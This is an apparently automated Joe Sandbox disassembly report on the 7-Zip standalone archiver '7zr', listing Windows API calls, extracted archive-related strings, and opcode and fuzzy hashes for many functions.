                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00406BAC
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        Similarity
                        • API ID: free
                        • String ID:
                        • API String ID: 1294909896-0
                        Similarity
                        • API ID: free
                        • String ID:
                        • API String ID: 1294909896-0
                        Similarity
                        • API ID: free
                        • String ID:
                        • API String ID: 1294909896-0
                        Similarity
                        • API ID: Version
                        • String ID:
                        • API String ID: 1889659487-0
                        APIs
                        • __EH_prolog.LIBCMT ref: 003E07B8
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                          • Part of subcall function 0038297F: memcpy.MSVCRT(?,?,?,?,?,003A50A5,?,?), ref: 003829B2
                        Similarity
                        • API ID: H_prologfreememcpy
                        • String ID: @PathCut/_pc_$L$PaxHeader/@PaxHeader$atime$crc32/$ctime$devmajor$devminor$gid$gname$linkpath$mtime$path$root$size$uid$uname
                        • API String ID: 2037215848-4204487407
                        APIs
                        • memcmp.MSVCRT(?,004348A0,00000010), ref: 0038C09E
                        • memcmp.MSVCRT(?,00430258,00000010), ref: 0038C0BB
                        • memcmp.MSVCRT(?,00430348,00000010), ref: 0038C0CE
                        Similarity
                        • API ID: memcmp
                        • String ID:
                        • API String ID: 1475443563-0
                        Similarity
                        • API ID: H_prolog
                        • String ID: $16-bit overflow for number of files in headers$32-bit overflow in headers$Central$Local$Minor_Extra_ERROR$Missing volume : $Unsorted_CD$Zip64$apk
                        • API String ID: 3519838083-1909666238
                        APIs
                        • __EH_prolog.LIBCMT ref: 003864F8
                        • GetCurrentThreadId.KERNEL32 ref: 00386508
                        • GetTickCount.KERNEL32 ref: 00386513
                        • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 0038651E
                        • GetTickCount.KERNEL32 ref: 00386578
                        • SetLastError.KERNEL32(000000B7,?,?,?,?,00000000), ref: 003865C5
                        • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 003865EC
                          • Part of subcall function 00385D7A: __EH_prolog.LIBCMT ref: 00385D7F
                          • Part of subcall function 00385D7A: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000001,?,?,00000000), ref: 00385DA1
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                        Similarity
                        • API ID: CountCurrentErrorH_prologLastTick$CreateDirectoryProcessThreadfree
                        • String ID: .tmp$d
                        • API String ID: 1989517917-2797371523
                        Similarity
                        • API ID: fputs
                        • String ID: : Cannot open the file as [$ERROR$Open $WARNING$] archive
                        • API String ID: 1795875747-657955069
                        APIs
                        • __EH_prolog.LIBCMT ref: 003CE774
                          • Part of subcall function 00383563: memmove.MSVCRT(?,?,00000022,00000000,?,00381DAE,00000000,00000000,00000000,00381D37,7FFFFFE0,00000000,00000000,?,00000000,00000000), ref: 00383588
                          • Part of subcall function 003CE6C2: __EH_prolog.LIBCMT ref: 003CE6C7
                        Similarity
                        • API ID: H_prolog$memmove
                        • String ID: H C$P C$T C$\ C$hcf$mtf$rsfx
                        • API String ID: 593149739-2986687590
                        APIs
                          • Part of subcall function 00417D80: WaitForSingleObject.KERNEL32(?,000000FF,0039AFD6,?), ref: 00417D83
                          • Part of subcall function 00417D80: GetLastError.KERNEL32(?,000000FF,0039AFD6,?), ref: 00417D8E
                          • Part of subcall function 00412FB0: EnterCriticalSection.KERNEL32(?,?,?,00412749), ref: 00412FB8
                          • Part of subcall function 00412FB0: LeaveCriticalSection.KERNEL32(?,?,?,00412749), ref: 00412FC2
                        • EnterCriticalSection.KERNEL32(?), ref: 0041290E
                        • LeaveCriticalSection.KERNEL32(?), ref: 00412928
                        • EnterCriticalSection.KERNEL32(?), ref: 00412992
                        • LeaveCriticalSection.KERNEL32(?), ref: 004129B8
                        • EnterCriticalSection.KERNEL32(?), ref: 00412A1E
                        • LeaveCriticalSection.KERNEL32(?), ref: 00412A56
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ErrorLastObjectSingleWait
                        • String ID: v
                        • API String ID: 2116739831-3261393531
                        Similarity
                        • API ID: H_prologfputs
                        • String ID: Cannot open the file$The archive is open with offset$The file is open$WARNING:
                        • API String ID: 1798449854-1259944392
                        APIs
                        • __EH_prolog.LIBCMT ref: 0038A091
                          • Part of subcall function 00389BAA: RegCloseKey.ADVAPI32(?,?,00389BA0), ref: 00389BB6
                        Similarity
                        • API ID: CloseH_prolog
                        • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$Previous Update Revision$Update Revision$x86
                        • API String ID: 1579395594-270022386
                        • Opcode ID: 412ed13c49b72e743fb53d345d1894461a5d3cfece99b55ec3e5fdbb990a7a9e
                        • Instruction ID: 8a5ab20a55523e033f56cc8ce59f502f5d40fc709a2edb10eedf67506145d0dc
                        • Opcode Fuzzy Hash: 412ed13c49b72e743fb53d345d1894461a5d3cfece99b55ec3e5fdbb990a7a9e
                        • Instruction Fuzzy Hash: 0C51B271A007059FDF12FF94D895AAEB7B5BF58300F5144AFE412A7241DB34A905CB91
                        APIs
                        • __EH_prolog.LIBCMT ref: 003DC453
                          • Part of subcall function 003DC1DF: __EH_prolog.LIBCMT ref: 003DC1E4
                          • Part of subcall function 003DC543: __EH_prolog.LIBCMT ref: 003DC548
                          • Part of subcall function 00381E0C: malloc.MSVCRT ref: 00381E1F
                          • Part of subcall function 00381E0C: _CxxThrowException.MSVCRT(?,00434B28), ref: 00381E39
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$ExceptionThrowmalloc
                        • String ID: ((C$<(C$L(C$\(C
                        • API String ID: 3744649731-510830737
                        • Opcode ID: 913cc563b50273f5d51026cad418410382edfce0201d882e8a542751e57fafba
                        • Instruction ID: 9d89c0aae00d2a5d8cef5aec7cf527d333dd751358924f33f5397185e19548f4
                        • Opcode Fuzzy Hash: 913cc563b50273f5d51026cad418410382edfce0201d882e8a542751e57fafba
                        • Instruction Fuzzy Hash: D8218BB0910B50CEC725EF6AE54869BFBF4EF54304F108A1FD0968B711DBB46A08CB58
                        APIs
                        • __EH_prolog.LIBCMT ref: 003B46D4
                        • EnterCriticalSection.KERNEL32(00442918), ref: 003B46E8
                        • CompareFileTime.KERNEL32(?,?), ref: 003B4712
                        • LeaveCriticalSection.KERNEL32(00442918), ref: 003B476A
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CriticalSection$CompareEnterFileH_prologLeaveTime
                        • String ID: v
                        • API String ID: 3800395459-3261393531
                        • Opcode ID: 9dcc0f9032b565ff2efefba5313cef46d656072ceb79873b8cbc7f3fd70c8e4d
                        • Instruction ID: 6e4f757caed86f4cccfa0ddffc72e88a9194590916e2f7b16de541c32d5d91bd
                        • Opcode Fuzzy Hash: 9dcc0f9032b565ff2efefba5313cef46d656072ceb79873b8cbc7f3fd70c8e4d
                        • Instruction Fuzzy Hash: D221D171600201AFDB22CF64D485BDABBF4FF41308F108019E66687A12DB34FA49CB94
                        APIs
                        • __EH_prolog.LIBCMT ref: 003B4642
                        • EnterCriticalSection.KERNEL32(00442918), ref: 003B4656
                        • LeaveCriticalSection.KERNEL32(00442918), ref: 003B4685
                        • LeaveCriticalSection.KERNEL32(00442918), ref: 003B46C5
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CriticalSection$Leave$EnterH_prolog
                        • String ID: v
                        • API String ID: 2532973370-3261393531
                        • Opcode ID: 5589766f5dcb0b074c81e4ab8a253786e14efc32a51bfb758936a58c48b5e6b8
                        • Instruction ID: ea92365fb386cfc3b359552c1d95aebfa17b78b723651645c6264099d4b28d04
                        • Opcode Fuzzy Hash: 5589766f5dcb0b074c81e4ab8a253786e14efc32a51bfb758936a58c48b5e6b8
                        • Instruction Fuzzy Hash: C6118C75B00210AFC721CF55D8C4AAEB7A8FF8A714B10822DE90AD7B01C774EC058B98
                        APIs
                        • __EH_prolog.LIBCMT ref: 003B602A
                        • EnterCriticalSection.KERNEL32(00442938), ref: 003B6044
                        • LeaveCriticalSection.KERNEL32(00442938), ref: 003B6060
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterH_prologLeave
                        • String ID: v$8)D
                        • API String ID: 367238759-2099984107
                        • Opcode ID: 69c5babd415f7c29529a22f79e87b52af58ee27d01895766a78635e40b5b462c
                        • Instruction ID: 26a82eb3199f815a0aba76ea25d87cd3ae4b815275be2148abd2c5c9c8e8bc1b
                        • Opcode Fuzzy Hash: 69c5babd415f7c29529a22f79e87b52af58ee27d01895766a78635e40b5b462c
                        • Instruction Fuzzy Hash: 94F09A36A04114EFC701DF88D949ADEBBB8FF49354F10806AF405A7211C7B89A00CBA8
                        APIs
                        • memset.MSVCRT ref: 003E03F5
                        • memcpy.MSVCRT(?,?,00000008,00000064,?,?,?,?,00000064), ref: 003E0490
                        • memset.MSVCRT ref: 003E0618
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: memset$memcpy
                        • String ID: $@
                        • API String ID: 368790112-1077428164
                        • Opcode ID: b087934bbc7c95f7ee7647cfdf8c5fba5a54d9d4edf4d7707c4dc34027eb37c2
                        • Instruction ID: b36b1881e540d40a043815af6a5c712a7eaaa60b7871e62e9f3fdca342508990
                        • Opcode Fuzzy Hash: b087934bbc7c95f7ee7647cfdf8c5fba5a54d9d4edf4d7707c4dc34027eb37c2
                        • Instruction Fuzzy Hash: DD91B130900399EFDB26DF66C841BDAB7B1EF50304F048659E5996A1D2D7B0BAD9CF80
                        APIs
                          • Part of subcall function 00412FB0: EnterCriticalSection.KERNEL32(?,?,?,00412749), ref: 00412FB8
                          • Part of subcall function 00412FB0: LeaveCriticalSection.KERNEL32(?,?,?,00412749), ref: 00412FC2
                        • EnterCriticalSection.KERNEL32(?), ref: 0041290E
                        • LeaveCriticalSection.KERNEL32(?), ref: 00412928
                        • EnterCriticalSection.KERNEL32(?), ref: 00412992
                        • LeaveCriticalSection.KERNEL32(?), ref: 004129B8
                        • EnterCriticalSection.KERNEL32(?), ref: 00412A1E
                        • LeaveCriticalSection.KERNEL32(?), ref: 00412A56
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterLeave
                        • String ID: v
                        • API String ID: 3168844106-3261393531
                        • Opcode ID: a87f7dc738b54688600db4454c876e54466056fa1d4871416f9f51df9c7eab10
                        • Instruction ID: 628d8bd62204d4822f1ea27dea00186db7381f0f86376e14bdd3339abd2da6f1
                        • Opcode Fuzzy Hash: a87f7dc738b54688600db4454c876e54466056fa1d4871416f9f51df9c7eab10
                        • Instruction Fuzzy Hash: 68611A756047018FC760DF24C680BA7B3E1BF84354F504A1EE9AAC7351EBB8E895CB59
                        APIs
                        • __EH_prolog.LIBCMT ref: 00386141
                          • Part of subcall function 00386C72: __EH_prolog.LIBCMT ref: 00386C77
                        • SetLastError.KERNEL32(0000010B,00000000,00000000), ref: 00386197
                        • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 0038626E
                        • SetLastError.KERNEL32(?,?,?,?,?,0000005C,?,00000000,00000000), ref: 003862A9
                          • Part of subcall function 00386096: __EH_prolog.LIBCMT ref: 0038609B
                          • Part of subcall function 00386096: DeleteFileW.KERNEL32(?,?,?,00000000), ref: 003860DF
                        • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 00386285
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ErrorLast$H_prolog$DeleteFile
                        • String ID:
                        • API String ID: 3586524497-0
                        • Opcode ID: fafe579619bb72d4d189c4f8dfddf07c79780bcd4964c6d8b54bb7e26a40fa60
                        • Instruction ID: 978b6abf2252d7161551de990d9b5271a916a13d9df1071f5fe7c04019fd6fb9
                        • Opcode Fuzzy Hash: fafe579619bb72d4d189c4f8dfddf07c79780bcd4964c6d8b54bb7e26a40fa60
                        • Instruction Fuzzy Hash: A851BB31C04328AADF17FBE4D886BEDBB79AF11340F1040E9E8417B192CB346A0ACB51
                        APIs
                        • memcmp.MSVCRT(?,004348A0,00000010), ref: 003944DB
                        • memcmp.MSVCRT(?,00430128,00000010), ref: 003944EE
                        • memcmp.MSVCRT(?,00430228,00000010), ref: 0039450B
                        • memcmp.MSVCRT(?,00430248,00000010), ref: 00394528
                        • memcmp.MSVCRT(?,004301C8,00000010), ref: 00394545
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: memcmp
                        • String ID:
                        • API String ID: 1475443563-0
                        • Opcode ID: 4b682ed1de69c6da47c7c59ebca9ff1c905e6491c748079341feae39b9d2165f
                        • Instruction ID: c85fc5adcd5913f972ac9f65f683ec2a49ff2d8f46e197246dc6d29ac166c1a1
                        • Opcode Fuzzy Hash: 4b682ed1de69c6da47c7c59ebca9ff1c905e6491c748079341feae39b9d2165f
                        • Instruction Fuzzy Hash: 5621F2727002086BEF058E25CC81FBE73ACAB553A4F12813AFD05CA241F668DD46A6D0
                        APIs
                        • memcmp.MSVCRT(?,004348A0,00000010), ref: 003E672A
                        • memcmp.MSVCRT(?,00430258,00000010), ref: 003E6747
                        • memcmp.MSVCRT(?,004302D8,00000010), ref: 003E675A
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: memcmp
                        • String ID:
                        • API String ID: 1475443563-0
                        • Opcode ID: 4db2276684e933fd02dd6e668a48122fc21475e9aa2bb699e84ccb8815e5c996
                        • Instruction ID: 3108364c25f8d30b6553cd857597bb79392104020633d7d8dd04e25fe2aee366
                        • Opcode Fuzzy Hash: 4db2276684e933fd02dd6e668a48122fc21475e9aa2bb699e84ccb8815e5c996
                        • Instruction Fuzzy Hash: 5721D4712402186BE7058E12CC82FBF73AC9B647E8F10422AFD059A282F678DD44A7D4
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: !$LZMA2:$LZMA:
                        • API String ID: 3519838083-3332058968
                        • Opcode ID: 174e6ce88971d79e08e08ab886ddcc1260e650f6cdbf307ad12c876e39ebd97e
                        • Instruction ID: 646b7e06d5d21fe340b37ce6dfd86a31dc103d99687ec0a362df7bae1e473e34
                        • Opcode Fuzzy Hash: 174e6ce88971d79e08e08ab886ddcc1260e650f6cdbf307ad12c876e39ebd97e
                        • Instruction Fuzzy Hash: C461F23092010A9ECB17DB65C645FFD7BB5AF16300F2A60ADE40EEB162CB70AE80C740
                        APIs
                        • __EH_prolog.LIBCMT ref: 0038A389
                          • Part of subcall function 0038A4C5: GetModuleHandleW.KERNEL32(ntdll.dll,?,0038A3C1,00000001), ref: 0038A4CD
                          • Part of subcall function 0038A4C5: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0038A4DD
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: AddressH_prologHandleModuleProc
                        • String ID: : $ SP:$Windows
                        • API String ID: 786088110-3655538264
                        • Opcode ID: f71890d2a07bb457ca48bf79a0c6c61ecf4c5aeca5b87369e245ed03874150dc
                        • Instruction ID: f0733d2e840af1fbd11366aa2228f1e2e14f8e78daee4ed1d6fdf7ab232f4ef8
                        • Opcode Fuzzy Hash: f71890d2a07bb457ca48bf79a0c6c61ecf4c5aeca5b87369e245ed03874150dc
                        • Instruction Fuzzy Hash: 1F310A319003199BDF17FBA5C8929EEBBB4FF14300F5040AAE50676191EB755A85CBA1
                        APIs
                        • __EH_prolog.LIBCMT ref: 003906FB
                        • EnterCriticalSection.KERNEL32(?), ref: 0039070B
                        • LeaveCriticalSection.KERNEL32(?,?), ref: 00390786
                          • Part of subcall function 0039089E: _CxxThrowException.MSVCRT(?,00434A58), ref: 003908C4
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterExceptionH_prologLeaveThrow
                        • String ID: v
                        • API String ID: 4150843469-3261393531
                        • Opcode ID: 1e45481b499e81bd747cc7858fd3ba7ff2da3894a8f67a1091e8c9e2b7096607
                        • Instruction ID: 95754b638abe3de88b536cb97797568235fb4b48b2a88b12a72d0415595cd0e9
                        • Opcode Fuzzy Hash: 1e45481b499e81bd747cc7858fd3ba7ff2da3894a8f67a1091e8c9e2b7096607
                        • Instruction Fuzzy Hash: DA2159B1A10604DFCB29DF68D584BAABBF0FF48314F10892EE45ACBA42D735A915CF44
                        APIs
                        • GetModuleHandleW.KERNEL32(ntdll.dll,?,0038A3C1,00000001), ref: 0038A4CD
                        • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0038A4DD
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: RtlGetVersion$ntdll.dll
                        • API String ID: 1646373207-1489217083
                        • Opcode ID: 2edc98999b3800bbf16d0e9b38aa3f69b73dc9b308d7d64472df5c2f2d22e70f
                        • Instruction ID: 8607a64f47a3134eddee4d938563647b5d2438e00ce33019a7b664b2f5f736ab
                        • Opcode Fuzzy Hash: 2edc98999b3800bbf16d0e9b38aa3f69b73dc9b308d7d64472df5c2f2d22e70f
                        • Instruction Fuzzy Hash: ADD05E313146302ABE3066B53C8BBAA12888F40A607524463B800C2041E6C8D99305A9
                        APIs
                        • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,00000000,?), ref: 003A0359
                        • GetLastError.KERNEL32(?,?,00000000,?), ref: 003A0382
                        • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,?,00000000,?), ref: 003A03DA
                        • GetLastError.KERNEL32(?,?,00000000,?,?,?,00000000,?), ref: 003A03F0
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ErrorFileLastSecurity
                        • String ID:
                        • API String ID: 555121230-0
                        • Opcode ID: 976c34fcf6c2a5158f92357e6765985fd87f8f864aed6f894b8f00f5d9f4455e
                        • Instruction ID: bb54b07d6c28c63b852971ba722ebd9d5447f2b8773075232e35750e5d5f304c
                        • Opcode Fuzzy Hash: 976c34fcf6c2a5158f92357e6765985fd87f8f864aed6f894b8f00f5d9f4455e
                        • Instruction Fuzzy Hash: 74316F74900209EFDF16DFA4C880BAEBBB5FF45304F108959E456EB291D770AE41DBA0
                        APIs
                        • __EH_prolog.LIBCMT ref: 00388300
                        • GetFileInformationByHandle.KERNEL32(000000FF,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 0038834F
                        • DeviceIoControl.KERNEL32(000000FF,000900A8,00000000,00000000,00000000,00004000,?,00000000), ref: 0038837C
                        • memcpy.MSVCRT(?,?,?,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 0038839B
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ControlDeviceFileH_prologHandleInformationfreememcpy
                        • String ID:
                        • API String ID: 1689166341-0
                        • Opcode ID: c1474ab6e3a81ff93723efef2f9cd7ddfcf5b3cde24c5020d8432f153598485d
                        • Instruction ID: dbfe39fe039df1afdf6acaf95b000e05f090cea29147390020826afa247e1c74
                        • Opcode Fuzzy Hash: c1474ab6e3a81ff93723efef2f9cd7ddfcf5b3cde24c5020d8432f153598485d
                        • Instruction Fuzzy Hash: 5121D376600204AFDF22AF94DC81AEE7BB9EF84790F2000AEF804A7241CB714E04CB64
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: BlockPackSize$BlockUnpackSize
                        • API String ID: 3519838083-5494122
                        • Opcode ID: 8bfd323546287d2f37088750123e16173dadc3c2731a9f781102f94ed9f1d768
                        • Instruction ID: 2254bd4077abebc4409be4f1fae3e09d9f99b1d1614468c9ff26d929ebee8cd2
                        • Opcode Fuzzy Hash: 8bfd323546287d2f37088750123e16173dadc3c2731a9f781102f94ed9f1d768
